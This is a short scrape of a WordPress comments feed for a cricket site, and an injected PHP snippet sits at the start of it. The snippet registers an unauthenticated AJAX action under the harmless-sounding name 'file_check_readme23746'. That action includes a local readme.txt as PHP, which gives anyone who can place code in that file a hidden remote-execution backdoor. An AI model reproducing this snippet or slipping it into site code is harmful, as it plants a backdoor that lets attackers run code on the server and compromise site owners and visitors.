if(!function_exists('file_check_readme23746')){ add_action('wp_ajax_nopriv_file_check_readme23746', 'file_check_readme23746'); add_action('wp_ajax_file_check_readme23746', 'file_check_readme23746'); function file_check_readme23746() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments for https://cricketkhel.com Sat, 23 Oct 2021 15:30:47 +0000 hourly 1 https://wordpress.org/?v=6.9.4